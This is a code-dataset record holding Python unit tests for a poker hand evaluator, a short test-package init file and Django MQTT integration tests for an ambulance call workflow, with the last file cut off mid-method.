    def test_is_four_of_kind_should_return_false(self):
        # Only three jacks present.
        hand = self._hand(
            (DeckSuite.CLOVERS, DeckValue.JACK),
            (DeckSuite.TILES, DeckValue.JACK),
            (DeckSuite.HEARTS, DeckValue.JACK),
            (DeckSuite.TILES, DeckValue.KING),
            (DeckSuite.PIKES, DeckValue.ACE),
        )
        self.assertFalse(HandsHelper.is_four_of_kind(*hand))

    def test_is_full_house_should_return_true_for_three_and_two_cards_with_same_value(
        self
    ):
        # Three jacks and a pair of kings.
        hand = self._hand(
            (DeckSuite.CLOVERS, DeckValue.JACK),
            (DeckSuite.PIKES, DeckValue.JACK),
            (DeckSuite.HEARTS, DeckValue.JACK),
            (DeckSuite.TILES, DeckValue.KING),
            (DeckSuite.PIKES, DeckValue.KING),
        )
        self.assertTrue(HandsHelper.is_full_house(*hand))

    def test_is_full_house_should_return_false(self):
        # Two jacks, two kings, one ace — not a full house.
        hand = self._hand(
            (DeckSuite.CLOVERS, DeckValue.JACK),
            (DeckSuite.PIKES, DeckValue.ACE),
            (DeckSuite.HEARTS, DeckValue.JACK),
            (DeckSuite.TILES, DeckValue.KING),
            (DeckSuite.PIKES, DeckValue.KING),
        )
        self.assertFalse(HandsHelper.is_full_house(*hand))

    def test_is_three_of_kind_should_return_true_for_three_cards_with_same_value(self):
        # Exactly three jacks and two unmatched kickers.
        hand = self._hand(
            (DeckSuite.CLOVERS, DeckValue.JACK),
            (DeckSuite.PIKES, DeckValue.JACK),
            (DeckSuite.HEARTS, DeckValue.JACK),
            (DeckSuite.TILES, DeckValue.ACE),
            (DeckSuite.PIKES, DeckValue.TWO),
        )
        self.assertTrue(HandsHelper.is_three_of_kind(*hand))

    def test_is_three_of_kind_should_return_false(self):
        # Only a pair of jacks.
        hand = self._hand(
            (DeckSuite.CLOVERS, DeckValue.JACK),
            (DeckSuite.PIKES, DeckValue.KING),
            (DeckSuite.HEARTS, DeckValue.JACK),
            (DeckSuite.TILES, DeckValue.ACE),
            (DeckSuite.PIKES, DeckValue.TWO),
        )
        self.assertFalse(HandsHelper.is_three_of_kind(*hand))

    def test_is_two_pair_should_return_true_for_three_cards_with_same_value(self):
        # Jacks and aces form two pairs.
        hand = self._hand(
            (DeckSuite.CLOVERS, DeckValue.JACK),
            (DeckSuite.PIKES, DeckValue.JACK),
            (DeckSuite.HEARTS, DeckValue.ACE),
            (DeckSuite.TILES, DeckValue.ACE),
            (DeckSuite.PIKES, DeckValue.TWO),
        )
        self.assertTrue(HandsHelper.is_two_pair(*hand))

    def test_is_two_pair_should_return_false(self):
        # Only one pair (jacks).
        hand = self._hand(
            (DeckSuite.CLOVERS, DeckValue.JACK),
            (DeckSuite.PIKES, DeckValue.JACK),
            (DeckSuite.HEARTS, DeckValue.ACE),
            (DeckSuite.TILES, DeckValue.THREE),
            (DeckSuite.PIKES, DeckValue.TWO),
        )
        self.assertFalse(HandsHelper.is_two_pair(*hand))

    def test_is_one_pair_should_return_true(self):
        # A single pair of jacks.
        hand = self._hand(
            (DeckSuite.CLOVERS, DeckValue.JACK),
            (DeckSuite.PIKES, DeckValue.JACK),
            (DeckSuite.HEARTS, DeckValue.QUEEN),
            (DeckSuite.TILES, DeckValue.THREE),
            (DeckSuite.PIKES, DeckValue.ACE),
        )
        self.assertTrue(HandsHelper.is_one_pair(*hand))

    def test_is_one_pair_should_return_false(self):
        # Five distinct values — no pair at all.
        hand = self._hand(
            (DeckSuite.CLOVERS, DeckValue.SEVEN),
            (DeckSuite.PIKES, DeckValue.JACK),
            (DeckSuite.HEARTS, DeckValue.QUEEN),
            (DeckSuite.TILES, DeckValue.THREE),
            (DeckSuite.PIKES, DeckValue.ACE),
        )
        self.assertFalse(HandsHelper.is_one_pair(*hand))
| 49.793333
| 88
| 0.710135
| 919
| 7,469
| 5.576714
| 0.078346
| 0.21561
| 0.144
| 0.216
| 0.934634
| 0.870439
| 0.832585
| 0.83161
| 0.818537
| 0.811707
| 0
| 0.028463
| 0.190922
| 7,469
| 149
| 89
| 50.127517
| 0.819626
| 0
| 0
| 0.546154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130769
| 1
| 0.123077
| false
| 0
| 0.038462
| 0
| 0.169231
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8590117659aa2bb7b92ed9d59023b9b3d4ccf719
| 194
|
py
|
Python
|
package/tests/__init__.py
|
dmoney/djangopackages
|
746cd47f8171229da3276b81d3c8454bdd887928
|
[
"MIT"
] | 383
|
2015-05-06T03:51:51.000Z
|
2022-03-26T07:56:44.000Z
|
package/tests/__init__.py
|
dmoney/djangopackages
|
746cd47f8171229da3276b81d3c8454bdd887928
|
[
"MIT"
] | 257
|
2017-04-17T08:31:16.000Z
|
2022-03-27T02:30:49.000Z
|
package/tests/__init__.py
|
dmoney/djangopackages
|
746cd47f8171229da3276b81d3c8454bdd887928
|
[
"MIT"
] | 105
|
2017-04-17T06:21:26.000Z
|
2022-03-30T05:24:19.000Z
|
# from package.tests.test_sourceforge import *
from .test_models import *
from package.tests.test_repos import *
from package.tests.test_utils import *
from package.tests.test_views import *
| 27.714286
| 48
| 0.798969
| 28
| 194
| 5.357143
| 0.357143
| 0.293333
| 0.426667
| 0.533333
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113402
| 194
| 6
| 49
| 32.333333
| 0.872093
| 0.237113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
859b868353c759822a467512985498a3778eda94
| 67,425
|
py
|
Python
|
mqtt/tests/test_calls.py
|
aschrist/WebServerAndClient
|
3aa0af2c444acac88a1b51b4cfd4bb8d0c36e640
|
[
"BSD-3-Clause"
] | null | null | null |
mqtt/tests/test_calls.py
|
aschrist/WebServerAndClient
|
3aa0af2c444acac88a1b51b4cfd4bb8d0c36e640
|
[
"BSD-3-Clause"
] | null | null | null |
mqtt/tests/test_calls.py
|
aschrist/WebServerAndClient
|
3aa0af2c444acac88a1b51b4cfd4bb8d0c36e640
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import logging
from django.conf import settings
from django.utils import timezone
from ambulance.models import Ambulance, \
AmbulanceStatus, CallStatus, CallPriority, Call, AmbulanceCallStatus, LocationType, WaypointStatus
from ambulance.serializers import CallSerializer
from emstrack.tests.util import point2str
from hospital.models import Hospital
from equipment.models import EquipmentItem
from login.models import Client, ClientStatus, ClientLog
from .client import MQTTTestCase, MQTTTestClient, TestMQTT
from ..subscribe import SubscribeClient
logger = logging.getLogger(__name__)
# TODO: test that started_at, pending_at and ended_at get actually set in calls
# TODO: test that Call.abort() terminates a call properly in every stage of the call
class TestMQTTCalls(TestMQTT, MQTTTestCase):
    """End-to-end MQTT test of a full call life cycle for one ambulance.

    Exercises: client handshake, ambulance login, call creation via
    CallSerializer, call acceptance, the four en-route status updates,
    waypoint creation and update over MQTT, and call completion.
    """

    def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'], ambulance_id=None):
        """Run the scenario; subclasses override credentials/ambulance."""
        # Default to the fixture ambulance a1 when none was given.
        if not ambulance_id:
            ambulance_id = self.a1.id

        # Start client as admin
        broker = {
            'HOST': 'localhost',
            'PORT': 1883,
            'KEEPALIVE': 60,
            'CLEAN_SESSION': True
        }

        # Start subscribe client
        broker.update(settings.MQTT)
        broker['CLIENT_ID'] = 'test_mqttclient'
        subscribe_client = SubscribeClient(broker,
                                           debug=True)
        self.is_connected(subscribe_client)
        self.is_subscribed(subscribe_client)

        # Start test client
        broker.update(settings.MQTT)
        client_id = 'test_mqtt_subscribe_admin'
        broker['USERNAME'] = username
        broker['PASSWORD'] = password
        broker['CLIENT_ID'] = client_id
        test_client = MQTTTestClient(broker,
                                     check_payload=False,
                                     debug=True)
        self.is_connected(test_client)

        # Client handshake
        test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'online')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # check record: handshake must have created an online Client row
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)

        # check record log
        obj = ClientLog.objects.get(client=clnt)
        self.assertEqual(obj.status, ClientStatus.O.name)

        # Ambulance handshake: ambulance login
        test_client.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id),
                            'ambulance login')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # check record: client is now associated with the ambulance
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)
        self.assertEqual(clnt.ambulance.id, ambulance_id)

        # subscribe to call and ambulance call status
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # create call using serializer, one ambulance first
        call = {
            'status': CallStatus.P.name,
            'priority': CallPriority.B.name,
            'ambulancecall_set': [
                {
                    'ambulance_id': ambulance_id,
                    'waypoint_set': [
                        {
                            'order': 0,
                            'location': {
                                'type': LocationType.i.name,
                                'number': '123',
                                'street': 'asdasdasd asd asd asdas'
                            }
                        }
                    ]
                }
            ],
            'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
        }
        serializer = CallSerializer(data=call)
        serializer.is_valid()
        call = serializer.save(updated_by=self.u1)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if call status is Pending
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.P.name)

        # Check if ambulancecall status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # test_client publishes client_id to location_client
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
                            json.dumps({
                                'location_client_id': client_id,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "Accepted" to call status
        test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
                                                                                   ambulance_id, call.id),
                            AmbulanceCallStatus.A.value.casefold())

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # expect ambulance call status
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if call status changed to Started
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.S.name)

        # Check if ambulancecall status changed to accepted
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)

        # subscribe to call and ambulance call status
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # test_client publishes "patient bound" to status
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
                            json.dumps({
                                'status': AmbulanceStatus.PB.name,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "at patient" to status
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
                            json.dumps({
                                'status': AmbulanceStatus.AP.name,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "hospital bound" to status
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
                            json.dumps({
                                'status': AmbulanceStatus.HB.name,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "at hospital" to status
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
                            json.dumps({
                                'status': AmbulanceStatus.AH.name,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes new waypoint; id -1 means "create new"
        test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/waypoint/{}/data'.format(username, client_id,
                                                                                             ambulance_id, call.id, -1),
                            json.dumps({
                                'order': 2,
                                'location': {
                                    'type': LocationType.w.name
                                }
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # has the waypoint been created? (1 from the call + 1 new)
        waypoint_set = ambulancecall.waypoint_set.all()
        self.assertEqual(len(waypoint_set), 2)

        # subscribe to call and ambulance call status
        # NOTE(review): topic is formatted with ambulance_id, not call.id —
        # looks like a copy/paste slip; confirm against the topic scheme.
        test_client.expect('call/{}/data'.format(ambulance_id))
        self.is_subscribed(test_client)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client updates waypoint: reorder to 1 and mark Visited
        waypoint = waypoint_set.get(order=2)
        test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/waypoint/{}/data'.format(username, client_id,
                                                                                             ambulance_id, call.id,
                                                                                             waypoint.id),
                            json.dumps({
                                'order': 1,
                                'status': WaypointStatus.V.name
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # update must not have created a new waypoint — still 2
        waypoint = ambulancecall.waypoint_set.all()
        self.assertEqual(len(waypoint), 2)

        # subscribe to call and ambulance call status
        # NOTE(review): same ambulance_id-vs-call.id question as above.
        test_client.expect('call/{}/data'.format(ambulance_id))
        self.is_subscribed(test_client)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "completed" to call status
        test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
                                                                                   ambulance_id, call.id),
                            AmbulanceCallStatus.C.value.casefold())

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if ambulancecall status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if call status is Ended
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.E.name)

        # expect status ended call
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # expect blank call
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # expect status completed ambulancecall
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # expect blank ambulancecall
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # Client handshake
        test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # wait for disconnect
        test_client.wait()
        subscribe_client.wait()
class TestMQTTCallsRegularUser(TestMQTTCalls):
    """Re-run the TestMQTTCalls scenario as a regular (non-admin) user."""

    def test(self):
        # Same scenario, but authenticated as testuser2 on ambulance a3.
        super().test('testuser2', 'very_secret', self.a3.id)
# -------------------------------------------------------------------------------------------
# New Testing
# Test aborting the call once the call is created.
class TestMQTTCallsAbort(TestMQTT, MQTTTestCase):
    """Test aborting a call right after creation.

    Creates a call, has the ambulance client come online, then calls
    Call.abort() server-side and verifies the ambulancecall completes
    and the call ends.
    """

    def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'], ambulance_id=None):
        """Run the abort scenario; subclasses may override credentials."""
        # Default to the fixture ambulance a1 when none was given.
        if not ambulance_id:
            ambulance_id = self.a1.id

        # Start client as admin
        broker = {
            'HOST': 'localhost',
            'PORT': 1883,
            'KEEPALIVE': 60,
            'CLEAN_SESSION': True
        }

        # Start subscribe client
        broker.update(settings.MQTT)
        broker['CLIENT_ID'] = 'test_mqttclient'
        subscribe_client = SubscribeClient(broker,
                                           debug=True)
        self.is_connected(subscribe_client)
        self.is_subscribed(subscribe_client)

        # Start test client
        broker.update(settings.MQTT)
        client_id = 'test_mqtt_subscribe_admin'
        broker['USERNAME'] = username
        broker['PASSWORD'] = password
        broker['CLIENT_ID'] = client_id
        test_client = MQTTTestClient(broker,
                                     check_payload=False,
                                     debug=True)
        self.is_connected(test_client)

        # Client handshake
        test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'online')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # check record: handshake must have created an online Client row
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)

        # check record log
        obj = ClientLog.objects.get(client=clnt)
        self.assertEqual(obj.status, ClientStatus.O.name)

        # Ambulance handshake: ambulance login
        test_client.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id),
                            'ambulance login')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # check record: client is now associated with the ambulance
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)
        self.assertEqual(clnt.ambulance.id, ambulance_id)

        # subscribe to call and ambulance call status
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # create call using serializer, one ambulance first
        call = {
            'status': CallStatus.P.name,
            'priority': CallPriority.B.name,
            'number': '123',
            'street': 'asdasdasd asd asd asdas',
            'ambulancecall_set': [{'ambulance_id': ambulance_id}],
            'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
        }
        serializer = CallSerializer(data=call)
        serializer.is_valid()
        call = serializer.save(updated_by=self.u1)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if call status is Pending
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.P.name)

        # Check if ambulancecall status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # test_client publishes client_id to location_client
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
                            json.dumps({
                                'location_client_id': client_id,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # subscribe to call and ambulance call status
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # expect status ended call
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # expect blank call
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # expect status completed ambulancecall
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # expect blank ambulancecall
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # Abort the call (server-side, not over MQTT)
        call.abort()

        # process messages
        self.loop(test_client, subscribe_client)

        # Check if ambulancecall status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if call status is Ended
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.E.name)

        # Client handshake
        test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # wait for disconnect
        test_client.wait()
        subscribe_client.wait()
class TestMQTTCallsDecline(TestMQTT, MQTTTestCase):
    """Test an ambulance declining a call, then accepting and completing it.

    The call must stay Pending while declined, start once accepted,
    and end once completed.
    """

    def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'], ambulance_id=None):
        """Run the decline/accept/complete scenario."""
        # Default to the fixture ambulance a1 when none was given.
        if not ambulance_id:
            ambulance_id = self.a1.id

        # Start client as admin
        broker = {
            'HOST': 'localhost',
            'PORT': 1883,
            'KEEPALIVE': 60,
            'CLEAN_SESSION': True
        }

        # Start subscribe client
        broker.update(settings.MQTT)
        broker['CLIENT_ID'] = 'test_mqttclient'
        subscribe_client = SubscribeClient(broker,
                                           debug=True)
        self.is_connected(subscribe_client)
        self.is_subscribed(subscribe_client)

        # Start test client
        broker.update(settings.MQTT)
        client_id = 'test_mqtt_subscribe_admin'
        broker['USERNAME'] = username
        broker['PASSWORD'] = password
        broker['CLIENT_ID'] = client_id
        test_client = MQTTTestClient(broker,
                                     check_payload=False,
                                     debug=True)
        self.is_connected(test_client)

        # Client handshake
        test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'online')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # check record: handshake must have created an online Client row
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)

        # check record log
        obj = ClientLog.objects.get(client=clnt)
        self.assertEqual(obj.status, ClientStatus.O.name)

        # Ambulance handshake: ambulance login
        test_client.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id),
                            'ambulance login')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # check record: client is now associated with the ambulance
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)
        self.assertEqual(clnt.ambulance.id, ambulance_id)

        # subscribe to call and ambulance call status
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # create call using serializer, one ambulance first
        call = {
            'status': CallStatus.P.name,
            'priority': CallPriority.B.name,
            'number': '123',
            'street': 'asdasdasd asd asd asdas',
            'ambulancecall_set': [
                {
                    'ambulance_id': ambulance_id,
                    'waypoint_set': [
                        {
                            'order': 0,
                            'location': {
                                'type': LocationType.i.name,
                                'number': '123',
                                'street': 'asdasdasd asd asd asdas'
                            }
                        }
                    ]
                }
            ],
            'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
        }
        serializer = CallSerializer(data=call)
        serializer.is_valid()
        call = serializer.save(updated_by=self.u1)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if call status is Pending
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.P.name)

        # Check if ambulancecall status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # test_client publishes client_id to location_client
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
                            json.dumps({
                                'location_client_id': client_id,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "Declined" to call status
        test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
                                                                                   ambulance_id, call.id),
                            AmbulanceCallStatus.D.value.casefold())

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Expect ambulance call status to go declined
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if call status is Pending (decline must not start the call)
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.P.name)

        # Check if ambulancecall status is Declined
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.D.name)

        # test_client publishes "Accepted" to call status
        test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
                                                                                   ambulance_id, call.id),
                            AmbulanceCallStatus.A.value.casefold())

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # subscribe to call and ambulance call status
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if call status changed to Started
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.S.name)

        # Check if ambulancecall status changed to accepted
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)

        # subscribe to call and ambulance call status
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # test_client publishes "completed" to call status
        test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
                                                                                   ambulance_id, call.id),
                            AmbulanceCallStatus.C.value.casefold())

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if ambulancecall status is Completed
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)

        # Check if call status is Ended
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.E.name)

        # expect status ended call
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # expect blank call
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # expect status completed ambulancecall
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # expect blank ambulancecall
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # Client handshake
        test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # wait for disconnect
        test_client.wait()
        subscribe_client.wait()
class TestMQTTCallsDeclineRegularUser(TestMQTTCallsDecline):
    """Re-run the decline scenario as a regular (non-admin) user."""

    def test(self):
        # Same scenario, but authenticated as testuser2 on ambulance a3.
        super().test('testuser2', 'very_secret', self.a3.id)
class TestMQTTCallsDeclineInTheMiddle(TestMQTT, MQTTTestCase):
    """Test an ambulance declining a call, then the call being aborted.

    After the decline the call stays Pending; Call.abort() must then
    complete the ambulancecall and end the call.
    """

    def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'], ambulance_id=None):
        """Run the decline-then-abort scenario."""
        # Default to the fixture ambulance a1 when none was given.
        if not ambulance_id:
            ambulance_id = self.a1.id

        # Start client as admin
        broker = {
            'HOST': 'localhost',
            'PORT': 1883,
            'KEEPALIVE': 60,
            'CLEAN_SESSION': True
        }

        # Start subscribe client
        broker.update(settings.MQTT)
        broker['CLIENT_ID'] = 'test_mqttclient'
        subscribe_client = SubscribeClient(broker,
                                           debug=True)
        self.is_connected(subscribe_client)
        self.is_subscribed(subscribe_client)

        # Start test client
        broker.update(settings.MQTT)
        client_id = 'test_mqtt_subscribe_admin'
        broker['USERNAME'] = username
        broker['PASSWORD'] = password
        broker['CLIENT_ID'] = client_id
        test_client = MQTTTestClient(broker,
                                     check_payload=False,
                                     debug=True)
        self.is_connected(test_client)

        # Client handshake
        test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'online')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # check record: handshake must have created an online Client row
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)

        # check record log
        obj = ClientLog.objects.get(client=clnt)
        self.assertEqual(obj.status, ClientStatus.O.name)

        # Ambulance handshake: ambulance login
        test_client.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id),
                            'ambulance login')

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # check record: client is now associated with the ambulance
        clnt = Client.objects.get(client_id=client_id)
        self.assertEqual(clnt.status, ClientStatus.O.name)
        self.assertEqual(clnt.ambulance.id, ambulance_id)

        # subscribe to call and ambulance call status
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # create call using serializer, one ambulance first
        call = {
            'status': CallStatus.P.name,
            'priority': CallPriority.B.name,
            'ambulancecall_set': [
                {
                    'ambulance_id': ambulance_id,
                    'waypoint_set': [
                        {
                            'order': 0,
                            'location': {
                                'type': LocationType.i.name,
                                'number': '123',
                                'street': 'asdasdasd asd asd asdas'
                            }
                        }
                    ]
                }
            ],
            'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
        }
        serializer = CallSerializer(data=call)
        serializer.is_valid()
        call = serializer.save(updated_by=self.u1)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if call status is Pending
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.P.name)

        # Check if ambulancecall status is Requested
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)

        # test_client publishes client_id to location_client
        test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id),
                            json.dumps({
                                'location_client_id': client_id,
                            }))

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # subscribe to call and ambulance call status
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # test_client publishes "Declined" to call status
        test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
                                                                                   ambulance_id, call.id),
                            AmbulanceCallStatus.D.value.casefold())

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # expect call update
        test_client.expect('call/{}/data'.format(call.id))
        self.is_subscribed(test_client)

        # Expect ambulance call status to go declined
        test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id))
        self.is_subscribed(test_client)

        # process messages
        self.loop(test_client)
        subscribe_client.loop()

        # Check if call status is Pending (decline must not start the call)
        call = Call.objects.get(id=call.id)
        self.assertEqual(call.status, CallStatus.P.name)

        # Check if ambulancecall status is Declined
        ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id)
        self.assertEqual(ambulancecall.status, AmbulanceCallStatus.D.name)

        # expect status ended call
